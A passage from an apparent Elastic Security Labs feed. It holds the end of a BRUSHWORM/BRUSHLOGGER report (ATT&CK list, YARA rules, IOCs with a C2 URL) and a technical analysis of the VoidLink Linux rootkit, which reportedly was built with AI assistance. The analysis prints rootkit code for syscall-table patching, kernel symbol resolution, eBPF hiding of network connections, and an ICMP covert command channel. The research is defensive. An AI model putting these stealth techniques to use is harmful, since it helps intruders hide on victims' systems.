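def decode_vk_pairs(hex_text):
    """Turn a run of two-digit hex virtual-key codes into characters.

    Letter and digit VK codes match their ASCII values; anything else
    is rendered as a bracketed hex code.
    """
    out = []
    for i in range(0, len(hex_text) - 1, 2):
        vk = int(hex_text[i:i + 2], 16)
        ch = chr(vk)
        out.append(ch if ch.isalnum() else "[%02X]" % vk)
    return "".join(out)

# XOR with a single byte is its own inverse, so we can round-trip a sample
sample = decrypt_log(bytes(b ^ 0x43 for b in b"41424331"))
print(decode_vk_pairs(sample.decode()))  # prints "ABC1"
</code></pre>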
<h2>Conclusion</h2>
<p>Despite their low sophistication and multiple implementation flaws, these two binaries deliver a functional collection platform that combines modular payload loading, USB worm propagation, broad file theft with air-gap bridging, and persistent keystroke capture via DLL side-loading. The iterative testing versions and active C2 infrastructure suggest an actor still refining their toolset. Elastic Security Labs will continue monitoring this activity cluster.</p>
<h2>BRUSHLOGGER, BRUSHWORM, and MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0006/">Credential Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0008/">Lateral Movement</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0009/">Collection</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0010/">Exfiltration</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task</a></li>
<li><a href="https://attack.mitre.org/techniques/T1574/002/">Hijack Execution Flow: DLL Side-Loading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1056/001/">Input Capture: Keylogging</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1140/">Deobfuscate/Decode Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1497/001/">Virtualization/Sandbox Evasion: System Checks</a></li>
<li><a href="https://attack.mitre.org/techniques/T1074/001/">Data Staged: Local Data Staging</a></li>
<li><a href="https://attack.mitre.org/techniques/T1091/">Replication Through Removable Media</a></li>
<li><a href="https://attack.mitre.org/techniques/T1119/">Automated Collection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1025/">Data from Removable Media</a></li>
<li><a href="https://attack.mitre.org/techniques/T1010/">Application Window Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/005/">Masquerading: Match Legitimate Name or Location</a></li>
</ul>
<h2>Detecting BRUSHLOGGER and BRUSHWORM</h2>
<h3>YARA</h3>
<p>Elastic Security has created YARA rules to identify this activity. The following rules detect BRUSHLOGGER and BRUSHWORM:</p>
<pre><code>rule Windows_Trojan_BrushLogger_304ee146 {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        arch = &quot;x86&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;BrushLogger&quot;
        threat_name = &quot;Windows.Trojan.BrushLogger&quot;
        reference_sample = &quot;4f1ea5ed6035e7c951e688bd9c2ec47a1e184a81e9ae783d4a0979501a1985cf&quot;

    strings:
        $a = &quot;%02d-%02d-%d %02d:%02d &quot; fullword
        $b = { 81 ?? ?? A1 00 00 00 74 09 81 ?? ?? A0 00 00 00 75 09 6A 00 6A 10 E8 }
    condition:
        all of them
}

rule Windows_Trojan_BrushWorm_7c2098ef {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        arch = &quot;x86&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;BrushWorm&quot;
        threat_name = &quot;Windows.Trojan.BrushWorm&quot;
        reference_sample = &quot;89891aa3867c1a57512d77e8e248d4a35dd32e99dcda0344a633be402df4a9a7&quot;

    strings:
        $a = &quot;internetCheckDomain&quot; wide fullword
        $b = { B8 00 00 00 40 33 C9 0F A2 48 8D ?? ?? ?? 89 07 89 5F 04 89 4F 08 89 57 0C 45 33 C0 }
    condition:
        all of them
}
</code></pre>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>89891aa3867c1a57512d77e8e248d4a35dd32e99dcda0344a633be402df4a9a7</code></td>
<td align="left">SHA-256</td>
<td align="left">paint.exe</td>
<td align="left">BRUSHWORM</td>
</tr>
<tr>
<td align="left"><code>4f1ea5ed6035e7c951e688bd9c2ec47a1e184a81e9ae783d4a0979501a1985cf</code></td>
<td align="left">SHA-256</td>
<td align="left">libcurl.dll</td>
<td align="left">BRUSHLOGGER</td>
</tr>
<tr>
<td align="left"><code>resources.dawnnewsisl[.]com/updtdll</code></td>
<td align="left">url</td>
<td align="left"></td>
<td align="left">C2 server</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/brushworm-targets-financial-services.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Illuminating VoidLink: Technical analysis of the VoidLink rootkit framework]]></title>
            <link>https://www.elastic.co/security-labs/illuminating-voidlink</link>
            <guid>illuminating-voidlink</guid>
            <pubDate>Thu, 26 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs analyzes VoidLink, a sophisticated Linux malware framework that combines traditional Loadable Kernel Modules with eBPF to maintain persistence.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>During a recent investigation, we came across a data dump containing source code, compiled binaries, and deployment scripts for the kernel rootkit components of <a href="https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/">VoidLink</a>, a cloud-native Linux malware framework first documented by Check Point Research in January 2026. Check Point's analysis revealed VoidLink to be a sophisticated, modular command-and-control framework written in Zig, featuring cloud-environment detection, a plugin ecosystem of over 30 modules, and multiple rootkit capabilities spanning userland rootkits (<code>LD_PRELOAD</code>), Loadable Kernel Modules (LKMs), and eBPF. In a <a href="https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/">follow-up publication</a>, Check Point presented compelling evidence that VoidLink was developed almost entirely through AI-assisted workflows using the TRAE integrated development environment (IDE), with a single developer producing the framework, from concept to functional implant, in under a week.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/illuminating-voidlink/image1.png" alt="Data dump" title="Terminal view showing a directory listing, with mixed files, scripts, archives, and binaries, used to illustrate the structure and complexity of raw data dumps." /></p>
<p>The data dump we obtained, which we attribute to the same Chinese-speaking threat actor, based on matching Simplified Chinese source comments and Alibaba Cloud infrastructure, contained the raw development history of VoidLink's rootkit subsystem. What Check Point described as a deployable stealth module, selected dynamically based on the target kernel version, was laid bare in our data dump as a multigenerational rootkit framework that had been actively developed, tested, and iterated across real targets, spanning CentOS 7 through Ubuntu 22.04.</p>
<p>The rootkit components masquerade under the module name <code>vl_stealth</code> (or, in some variants, <code>amd_mem_encrypt</code>), consistent with the kernel-level concealment capabilities described in Check Point's analysis. Their architecture immediately stood out: Rather than relying on a single technique, the rootkit combines a traditional LKM with eBPF programs in a hybrid design that we’ve rarely encountered in the wild. The LKM handles deep kernel manipulation, syscall hooking via ftrace, and an Internet Control Message Protocol–based (ICMP-based) covert command channel, while a companion eBPF program takes over the delicate task of hiding network connections from the <code>ss</code> utility by manipulating Netlink socket responses in userspace memory.</p>
<p>Across the data, we identified at least four distinct generations of VoidLink, each one refining its hooking strategy, evasion techniques, and operational stability. The earliest variant targeted CentOS 7 with direct syscall table patching. The most recent variant, which the developers dubbed &quot;Ultimate Stealth v5&quot; in their comments, introduces delayed hook installation, anti-debugging timers, process kill protection, and XOR-obfuscated module names.</p>
<p>Check Point's second publication already established that VoidLink was developed through AI-driven workflows. The rootkit source code we analyzed corroborates and extends this finding: The source files are littered with phased refactoring annotations, tutorial-style comments that explain basic kernel concepts, and iterative version numbering patterns that closely mirror multi-turn AI conversations. Where Check Point observed the macro-level development methodology (sprint planning, specification-driven development), our data dump reveals the micro-level reality of how individual rootkit components were iteratively prompted, tested, and refined.</p>
<p>In this research publication, we walk through the rootkit's architecture, trace its evolution across four generations, dissect its most technically interesting features, and provide actionable detection strategies. All Chinese source comments referenced in this analysis have been translated into English.</p>
<h2>Discovery and initial triage</h2>
<p>At first glance, the sheer volume of files, many with iterative version numbers, like <code>hide_ss_v3.bpf.c</code> through <code>hide_ss_v9.bpf.c</code>, suggested an active development effort rather than a one-off project. The presence of compiled <code>.ko</code> files for specific kernel versions, alongside three separate copies of <code>vmlinux.h</code> BPF Type Format (BTF) headers, confirmed that this code had been built and tested on real systems.</p>
<p>After sorting through the dump, we identified seven logical groupings. Three stand-alone LKM variants in the root directory targeted different kernel generations: <code>stealth_centos7_v2.c</code> (1,148 lines, targeting CentOS 7's kernel 3.10), <code>stealth_kernel5x.c</code> (767 lines, targeting kernel 5.x), and <code>stealth_v5.c</code> (876 lines, the &quot;Ultimate Stealth&quot; variant with delayed initialization). Two production directories, <code>kernel5x_new/</code> and <code>lkm_5x/</code>, contained polished variants with module parameters, eBPF companions, and versioned ICMP control scripts. An <code>ebpf_test/</code> directory contained 10 sequential iterations of ss-hiding eBPF programs and six versions of process-hiding programs, each building on the last, providing a clear record of iterative development. Finally, <code>load_lkm.sh</code> provided boot-time persistence with a particularly interesting feature: It scanned <code>/proc/*/exe</code> for processes running from <code>memfd</code> file descriptors, a telltale sign of fileless implants.</p>
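<p>That same heuristic is useful defensively. Below is a hypothetical Python sketch of the check that <code>load_lkm.sh</code> performs (function and variable names are ours, not the actor's):</p>
<pre><code class="language-python">import os

def is_memfd_backed(exe_target: str) -&gt; bool:
    &quot;&quot;&quot;On Linux, readlink on /proc/&lt;pid&gt;/exe for a process started from an
    anonymous memfd resolves to &quot;/memfd:&lt;name&gt; (deleted)&quot; rather than a real
    filesystem path; this is the fileless-implant tell the script scans for.&quot;&quot;&quot;
    return exe_target.startswith(&quot;/memfd:&quot;)

def find_memfd_processes() -&gt; list:
    &quot;&quot;&quot;Walk /proc and return (pid, exe_target) for memfd-backed processes.&quot;&quot;&quot;
    hits = []
    for pid in filter(str.isdigit, os.listdir(&quot;/proc&quot;)):
        try:
            target = os.readlink(f&quot;/proc/{pid}/exe&quot;)
        except OSError:
            continue  # process exited or access denied
        if is_memfd_backed(target):
            hits.append((int(pid), target))
    return hits
</code></pre>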
<p>Every source file was annotated entirely in Simplified Chinese. The comments ranged from straightforward function descriptions to detailed phase-numbered fix annotations. For example, the CentOS 7 variant's header contained a structured changelog that mapped perfectly to five development phases, translated here:</p>
<pre><code class="language-text">Phase 1: Security/logic vulnerabilities - bounds checking, UDP ports, memory leaks, byte order
Phase 2: Stealth enhancements - ICMP randomization, /proc/modules, kprobe hiding, log cleanup
Phase 3: Compatibility - dynamic symbol lookup, struct offsets, IPv6, kernel version adaptation
Phase 4: Stability - maxactive, RCU protection, priority, error handling
Phase 5: Defense mechanisms - anti-debugging, self-destruct, dynamic configuration
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/illuminating-voidlink/image2.png" alt="CentOS rootkit header" title="Source code header showing version and fix notes for a CentOS 7 stealth rootkit." /></p>
<p>Individual fixes throughout the code were tagged with identifiers like <code>[1.1]</code>, <code>[2.1]</code>, <code>[3.3]</code>, and <code>[5.2]</code>, each corresponding to a specific phase and fix number. We’ll return to the significance of this annotation pattern later, as it provides compelling evidence about the rootkit's development methodology.</p>
<p>The operator scripts revealed real infrastructure. The <code>icmp_ctl.py</code> usage examples referenced two Alibaba Cloud IP addresses, <code>8.149.128[.]10</code> and <code>116.62.172[.]147</code>, indicating that VoidLink was being used operationally against targets accessible from Chinese cloud infrastructure. The <code>load_lkm.sh</code> boot script hard-codes a path to <code>/root/kernel5x_new/vl_stealth.ko</code> and configures port <code>8080</code> to be hidden by default, further suggesting active deployment.</p>
<h2>Architecture: A hybrid approach</h2>
<p>What makes VoidLink architecturally notable is its two-component design. Most Linux rootkits rely on a single mechanism for hiding, whether that’s an LKM hooking syscalls, an eBPF program attached to tracepoints, or a shared object injected via <code>LD_PRELOAD</code>. VoidLink uses both an LKM and an eBPF program, each handling the task for which it is best suited. This hybrid approach is rarely seen in the wild and reflects a deliberate engineering decision.</p>
<p>The LKM component, which masquerades under the module name <code>vl_stealth</code> (or, in some variants, <code>amd_mem_encrypt</code>), is the backbone of the rootkit. It handles tasks that require deep kernel access: process hiding via <code>getdents64</code> syscall hooking, file and module trace removal via <code>vfs_read</code> filtering, network connection hiding via <code>seq_show</code> kretprobes, and the ICMP-based command-and-control channel via Netfilter hooks. These operations require manipulating kernel-internal data structures and intercepting kernel functions at a level that only a loaded kernel module can achieve.</p>
<p>The eBPF component handles a single but critical task: hiding network connections from the <code>ss</code> utility. The <code>ss</code> command doesn’t read from <code>/proc/net/tcp</code> as <code>netstat</code> does. Instead, it uses Netlink sockets with the <code>SOCK_DIAG_BY_FAMILY</code> protocol to query the kernel's socket diagnostic interface directly. This means that the kretprobe technique used to hide connections from <code>netstat</code>, which works by rolling back the <code>seq_file</code> output counter, has no effect on <code>ss</code>.</p>
<p>The developers initially attempted to hide connections from <code>ss</code> using a kretprobe on <code>inet_sk_diag_fill</code>, returning <code>-EAGAIN</code> to suppress individual entries. A comment in the source code, translated from Chinese, explains why they abandoned this approach: &quot;ss command hiding implemented by eBPF module (more stable)&quot;. The kretprobe method caused kernel instability, likely because <code>inet_sk_diag_fill</code> is called deep within the Netlink socket processing path, and returning an error code there could corrupt the response chain.</p>
<p>The eBPF solution is elegant. It hooks <code>__sys_recvmsg</code> using a kprobe at the entry point and a kretprobe at the return point. On entry, it captures the userspace receive buffer address from the <code>msghdr</code> structure. On return, it walks the chain of <code>nlmsghdr</code> structures in that buffer, checking each <code>SOCK_DIAG_BY_FAMILY</code> message for hidden source or destination ports. When it finds a match, rather than removing the entry (which would corrupt the Netlink message chain), it extends the previous message's <code>nlmsg_len</code> field to absorb the hidden entry. The <code>ss</code> parser then treats the hidden entry as padding within the previous message and silently skips it. This &quot;swallowing&quot; technique, implemented through <code>bpf_probe_write_user</code>, is a creative abuse of a BPF helper originally intended for debugging.</p>
<h2>Version evolution</h2>
<p>VoidLink evolved through at least four generations, each one adapting to newer kernel defenses while expanding the rootkit's capabilities. Tracing this evolution reveals not only the technical challenges the developers faced but also the iterative problem-solving approach, likely aided by a large language model (LLM) that defines this rootkit's development history.</p>
<h3>Generation 1: The CentOS 7 foundation</h3>
<p>The earliest variant, <code>stealth_centos7_v2.c</code>, targets CentOS 7 and its venerable 3.10 kernel. At 1,148 lines, it’s the longest file and contains the most extensive comments. This variant uses the oldest and most straightforward hooking technique available to LKM rootkits: direct modification of the syscall table.</p>
<p>On kernel 3.10, <code>kallsyms_lookup_name()</code> is still exported as a public kernel symbol, so locating the <code>sys_call_table</code> is trivial. The rootkit calls it directly to resolve function addresses. However, the kernel marks the syscall table as read-only, so modifying it requires temporarily disabling the processor's write protection bit in the <code>CR0</code> control register:</p>
<pre><code class="language-c">write_cr0(read_cr0() &amp; ~X86_CR0_WP);  // Disable write protection
sys_call_table[__NR_getdents64] = (unsigned long)hooked_getdents64;
sys_call_table[__NR_getdents] = (unsigned long)hooked_getdents;
write_cr0(read_cr0() | X86_CR0_WP);   // Re-enable write protection
</code></pre>
<p>This is a well-known technique with a long history in Linux rootkit development. More interesting is how the CentOS 7 variant handles GCC's interprocedural optimizations. When GCC inlines or clones functions, it renames them with suffixes like <code>.isra.0</code>, <code>.constprop.5</code>, or <code>.part.3</code>. This means a symbol like <code>tcp4_seq_show</code> might actually exist in the kernel as <code>tcp4_seq_show.isra.2</code>. VoidLink's <code>find_symbol_flexible()</code> function handles this by brute-forcing up to 20 numbered variants of each suffix:</p>
<pre><code class="language-c">static unsigned long find_symbol_flexible(const char *base_name)
{
    unsigned long addr;
    char buf[128];
    int i;

    addr = kallsyms_lookup_name(base_name);
    if (addr) return addr;

    for (i = 0; i &lt;= 20; i++) {
        snprintf(buf, sizeof(buf), &quot;%s.isra.%d&quot;, base_name, i);
        addr = kallsyms_lookup_name(buf);
        if (addr) return addr;
    }

    for (i = 0; i &lt;= 20; i++) {
        snprintf(buf, sizeof(buf), &quot;%s.constprop.%d&quot;, base_name, i);
        addr = kallsyms_lookup_name(buf);
        if (addr) return addr;
    }

    return 0;
}
</code></pre>
<p>Anyone who has developed kernel modules for CentOS 7 will recognize the frustration of symbols being renamed by compiler optimizations. The fact that VoidLink handles this systematically, across <code>.isra</code>, <code>.constprop</code>, and <code>.part</code> suffixes, suggests the developers encountered this problem during real-world deployment.</p>
<p>The CentOS 7 variant hooks both <code>getdents</code> and <code>getdents64</code> syscalls, because CentOS 7 userspace tools use both 32-bit and 64-bit directory entry formats. The <code>/proc/modules</code> file is handled separately by replacing the <code>seq_operations.show</code> function pointer after opening the file through <code>filp_open()</code>. This generation also introduces the anti-debugging timer and the self-destruct command, features that persist through all subsequent generations. One notable detail: The variant suppresses all kernel log output by redefining <code>pr_info</code>, <code>pr_err</code>, and <code>pr_warn</code> as no-ops, a simple but effective anti-forensics measure.</p>
<h3>Generation 2: Adapting to kernel 5.x</h3>
<p>The jump from CentOS 7's kernel 3.10 to kernel 5.x required fundamental changes to VoidLink's hooking strategy. Two kernel developments forced the developers' hand: <code>kallsyms_lookup_name()</code> was unexported starting in kernel 5.7, and the syscall table gained stronger write protections through <code>CONFIG_STRICT_KERNEL_RWX</code>.</p>
<p>The second generation, found in <code>stealth_kernel5x.c</code> and <code>lkm_test/main.c</code>, addresses the first problem with a technique known in rootkit development circles as the <em>kprobe trick</em>. Instead of calling <code>kallsyms_lookup_name()</code> directly, the rootkit registers a kprobe on it. The kernel's kprobe subsystem resolves the symbol address internally during registration and stores it in the <code>kp.addr</code> field. The rootkit reads this address and then immediately unregisters the kprobe:</p>
<pre><code class="language-c">static int init_symbols(void)
{
    struct kprobe kp = { .symbol_name = &quot;kallsyms_lookup_name&quot; };
    if (register_kprobe(&amp;kp) &lt; 0)
        return -EFAULT;
    kln_func = (kln_t)kp.addr;
    unregister_kprobe(&amp;kp);
    return kln_func ? 0 : -EFAULT;
}
</code></pre>
<p>This trick was popularized by modern rootkits such as Diamorphine and has become the de facto method for symbol resolution on post–5.7 kernels. Once <code>kallsyms_lookup_name</code> is available, the rootkit can resolve any other kernel symbol it needs.</p>
<p>For syscall hooking, Generation 2 abandons direct modification of the syscall table in favor of ftrace. The Linux kernel's function tracing framework was designed for performance analysis and debugging, but it provides a convenient API for attaching callbacks to arbitrary kernel functions. VoidLink registers ftrace hooks on <code>__x64_sys_getdents64</code> and <code>vfs_read</code>, using <code>FTRACE_OPS_FL_SAVE_REGS</code> and <code>FTRACE_OPS_FL_IPMODIFY</code> flags to gain full control over the hooked function's execution. The ftrace callback modifies the instruction pointer in the saved register state, redirecting execution to the rootkit's handler before the original function runs.</p>
<p>This generation also introduces <code>vfs_read</code> hooking to filter sensitive pseudo-files. When a process reads <code>/proc/kallsyms</code>, <code>/proc/modules</code>, or <code>/sys/kernel/debug/kprobes/list</code>, the rootkit intercepts the output buffer and removes any lines containing the module name or kretprobe registrations. This is a significant improvement over the CentOS 7 variant's approach of hooking <code>seq_operations.show</code> for a single file; the <code>vfs_read</code> hook provides a centralized filtering mechanism for all sensitive files.</p>
<h3>Generation 3: Production readiness</h3>
<p>The third generation, found in <code>kernel5x_new/</code> and <code>lkm_5x/</code>, represents the production-ready form of VoidLink. The most visible change is the addition of module parameters that allow the operator to configure the rootkit at load time without needing the ICMP channel:</p>
<pre><code class="language-shell">insmod vl_stealth.ko init_pids=1234 init_ports=8080 stealth=1
</code></pre>
<p>The <code>init_pids</code> parameter specifies process IDs to hide immediately after loading. The <code>init_ports</code> parameter lists ports to hide from <code>netstat</code> and <code>ss</code>. The <code>stealth</code> flag controls whether the module removes itself from the kernel's module list upon initialization. These parameters eliminate the need for a separate ICMP command to configure the rootkit after it loads, thereby reducing the window of vulnerability between module insertion and activation.</p>
<p>This generation also doubles the number of ICMP hook registrations by attaching to both the <code>NF_INET_PRE_ROUTING</code> and <code>NF_INET_LOCAL_IN</code> Netfilter chains. The dual registration ensures reliable command reception, regardless of the host's network configuration and iptables rules. Most rootkits register on only one Netfilter chain; VoidLink's dual approach demonstrates an awareness of operational failures that could occur in diverse network environments.</p>
<p>The most important change in Generation 3 is the delegation of <code>ss</code> hiding to the eBPF companion, which we will examine in detail shortly.</p>
<h2>The eBPF innovation: Hiding from ss</h2>
<p>One of the most technically interesting aspects of VoidLink is how it hides network connections from the <code>ss</code> utility. This problem has historically been a challenge for Linux rootkits because <code>ss</code> and <code>netstat</code> query the kernel through entirely different interfaces, meaning a rootkit that defeats one often fails against the other.</p>
<p>The <code>netstat</code> utility reads from <code>/proc/net/tcp</code>, <code>/proc/net/tcp6</code>, <code>/proc/net/udp</code>, and similar pseudo-files. The kernel generates these files via <code>seq_file</code> operations, calling functions such as <code>tcp4_seq_show()</code> for each socket entry. Hiding a connection from <code>netstat</code> is straightforward: Install a kretprobe on the relevant <code>seq_show</code> function and, when it returns, check whether the source or destination port matches a hidden port. If it does, roll back the <code>seq_file-&gt;count</code> counter to its pre-call value, effectively erasing the line from the output. VoidLink's LKM component uses exactly this approach for <code>netstat</code> hiding, and it works reliably.</p>
<p>The <code>ss</code> utility, however, uses the <code>SOCK_DIAG_BY_FAMILY</code> Netlink interface to query socket information directly from the kernel. The response arrives as a chain of Netlink messages (<code>nlmsghdr</code> structures), each containing an <code>inet_diag_msg</code> with socket details. This is a completely different data path from <code>/proc/net/tcp</code>, and the <code>seq_show</code> kretprobes don’t affect it.</p>
<p>The <code>ebpf_test/</code> directory tells the story of VoidLink's developers struggling to solve this problem. We found 10 sequential versions of <code>hide_ss.bpf.c</code> (v1 through v9, plus a &quot;final&quot; and &quot;full&quot; variant), each one attempting a different approach. The early versions tried to modify Netlink messages in kernel space, which proved unreliable. The later versions converged on the &quot;swallowing&quot; strategy used by the production variant.</p>
<p>The production eBPF program is located in <code>lkm_5x/ebpf/hide_ss.bpf.c</code> and hooks <code>__sys_recvmsg</code> at both entry and return. On entry, it captures the userspace buffer address from the <code>msghdr-&gt;msg_iov</code> chain:</p>
<pre><code class="language-c">SEC(&quot;kprobe/__sys_recvmsg&quot;)
int kprobe_recvmsg(struct pt_regs *regs)
{
    __u32 k = 0;
    __u8 *e = bpf_map_lookup_elem(&amp;enabled, &amp;k);
    if (!e || !*e)
        return 0;

    void *msg = (void *)regs-&gt;si;
    if (!msg)
        return 0;

    void *msg_iov;
    struct iovec iov;
    if (bpf_probe_read_user(&amp;msg_iov, 8, msg + 16) &lt; 0 || !msg_iov)
        return 0;
    if (bpf_probe_read_user(&amp;iov, sizeof(iov), msg_iov) &lt; 0 || !iov.iov_base)
        return 0;

    __u64 id = bpf_get_current_pid_tgid();
    struct rctx_data d = { .buf = iov.iov_base, .len = iov.iov_len };
    bpf_map_update_elem(&amp;recvmsg_ctx, &amp;id, &amp;d, BPF_ANY);
    return 0;
}
</code></pre>
<p>The buffer address and length are stored in a per-thread BPF hash map (<code>recvmsg_ctx</code>), keyed by the thread's PID/TID combination. This allows the return hook to retrieve the buffer address, even though it’s no longer available in the register state at function return.</p>
<p>The return hook is where the actual hiding occurs. After verifying that the <code>recvmsg</code> call succeeded, it walks the Netlink message chain in the userspace buffer:</p>
<pre><code class="language-c">SEC(&quot;kretprobe/__sys_recvmsg&quot;)
int kretprobe_recvmsg(struct pt_regs *regs)
{
    // ... setup and validation ...

    void *buf = d-&gt;buf;
    long offset = 0;
    long prev_offset = -1;
    __u32 prev_len = 0;

    #pragma unroll
    for (int i = 0; i &lt; 32; i++) {
        if (offset &gt;= ret || offset + NLMSG_HDRLEN &gt; ret)
            break;

        __u32 nlmsg_len;
        __u16 nlmsg_type;
        bpf_probe_read_user(&amp;nlmsg_len, 4, buf + offset);
        bpf_probe_read_user(&amp;nlmsg_type, 2, buf + offset + 4);

        int should_hide = 0;
        if (nlmsg_type == SOCK_DIAG_BY_FAMILY) {
            void *payload = buf + offset + NLMSG_HDRLEN;
            __u16 sport, dport;

            if (bpf_probe_read_user(&amp;sport, 2, payload + SPORT_OFF) == 0 &amp;&amp;
                bpf_probe_read_user(&amp;dport, 2, payload + DPORT_OFF) == 0) {

                sport = bpf_ntohs(sport);
                dport = bpf_ntohs(dport);

                if (bpf_map_lookup_elem(&amp;hidden_ports, &amp;sport) != NULL ||
                    bpf_map_lookup_elem(&amp;hidden_ports, &amp;dport) != NULL) {
                    should_hide = 1;
                }
            }
        }

        if (should_hide) {
            if (prev_offset &gt;= 0) {
                __u32 new_len = prev_len + nlmsg_len;
                bpf_probe_write_user(buf + prev_offset, &amp;new_len, 4);
            }
        } else {
            prev_offset = offset;
            prev_len = nlmsg_len;
        }

        offset += NLMSG_ALIGN(nlmsg_len);
    }
    // ...
}
</code></pre>
<p>For each Netlink message of type <code>SOCK_DIAG_BY_FAMILY</code>, the program reads the source and destination ports from fixed offsets within the <code>inet_diag_msg</code> payload (offsets 4 and 6, respectively). If either port matches an entry in the <code>hidden_ports</code> BPF map, the message is &quot;swallowed&quot; by extending the previous message's <code>nlmsg_len</code> to include the current message's length. The <code>bpf_probe_write_user()</code> call modifies the four-byte <code>nlmsg_len</code> field directly in the userspace buffer.</p>
<p>This technique works because Netlink parsers, including the one in <code>ss</code>, advance through the message chain using <code>NLMSG_NEXT()</code>, which calculates the next message offset from the current message's <code>nlmsg_len</code>. By inflating the previous message's length, the hidden message falls within the body of the previous message and is never parsed as a separate entry.</p>
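<p>The mechanics are easy to verify outside the kernel. The Python sketch below simulates a diagnostic response using plain 16-byte Netlink headers, inflates the first header's <code>nlmsg_len</code> the way the eBPF program does, and confirms that an <code>NLMSG_NEXT</code>-style walk no longer visits the hidden entry (the payloads are placeholders, not real <code>inet_diag_msg</code> structures):</p>
<pre><code class="language-python">import struct

NLMSG_HDRLEN = 16
SOCK_DIAG_BY_FAMILY = 20

def nlmsg_align(n: int) -&gt; int:
    return (n + 3) &amp; ~3

def build_msg(payload: bytes) -&gt; bytes:
    # struct nlmsghdr: nlmsg_len(u32) type(u16) flags(u16) seq(u32) pid(u32)
    length = NLMSG_HDRLEN + len(payload)
    hdr = struct.pack(&quot;&lt;IHHII&quot;, length, SOCK_DIAG_BY_FAMILY, 0, 0, 0)
    return hdr + payload + b&quot;\x00&quot; * (nlmsg_align(length) - length)

def walk(buf: bytes) -&gt; list:
    # NLMSG_NEXT-style traversal: step by each header's aligned nlmsg_len
    offset, seen = 0, []
    while offset + NLMSG_HDRLEN &lt;= len(buf):
        (length,) = struct.unpack_from(&quot;&lt;I&quot;, buf, offset)
        if length &lt; NLMSG_HDRLEN:
            break
        seen.append(offset)
        offset += nlmsg_align(length)
    return seen

buf = bytearray(build_msg(b&quot;AAAA&quot;) + build_msg(b&quot;HIDDEN!!&quot;) + build_msg(b&quot;CCCC&quot;))
assert len(walk(buf)) == 3

# &quot;Swallow&quot; the second message: extend the first header's nlmsg_len to
# cover it, as bpf_probe_write_user() does in the rootkit's kretprobe.
(first_len,) = struct.unpack_from(&quot;&lt;I&quot;, buf, 0)
(second_len,) = struct.unpack_from(&quot;&lt;I&quot;, buf, nlmsg_align(first_len))
struct.pack_into(&quot;&lt;I&quot;, buf, 0, first_len + second_len)
assert len(walk(buf)) == 2  # the hidden entry is now skipped as padding
</code></pre>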
<p>The same &quot;swallowing&quot; technique appears in the process-hiding experiments in the <code>ebpf_test/</code> directory. <code>hide_proc_v4.bpf.c</code> applies the identical approach to <code>getdents64</code>, extending the previous directory entry's <code>d_reclen</code> to absorb the hidden entry. This shows the developers recognized the pattern's general applicability and experimented with applying it beyond network hiding. We do note that process hiding was ultimately handled by the LKM's ftrace hook in the production variant rather than by eBPF, likely because the LKM approach was more reliable for the larger and more variable <code>getdents64</code> buffers.</p>
<h2>The ICMP covert channel</h2>
<p>Every VoidLink variant includes an ICMP-based command-and-control channel that leaves no listening ports, no filesystem artifacts, and, by design, no ICMP replies. The operator sends specially crafted ICMP Echo Request packets to the target host, and the rootkit's Netfilter hook intercepts them before the kernel's normal ICMP processing can generate a response. Commands are processed silently, and the packet is dropped.</p>
<p>The ICMP command protocol uses a simple but effective structure. The rootkit identifies its own traffic by checking the <code>echo.id</code> field in the ICMP header for a magic value, <code>0xC0DE</code>, by default. When a matching packet arrives, the rootkit extracts a 64-byte <code>icmp_cmd</code> structure from the payload:</p>
<pre><code class="language-c">struct icmp_cmd {
    u8 cmd;           // Command byte
    u8 len;           // Length of data
    u8 data[62];      // XOR-encrypted payload
} __attribute__((packed));
</code></pre>
<p>The <code>data</code> field is XOR-encrypted with a single-byte key, <code>0x42</code> by default. While XOR with a known key is trivially reversible, it serves its purpose: preventing casual network monitoring tools from reading commands in cleartext without requiring the overhead of proper cryptography.</p>
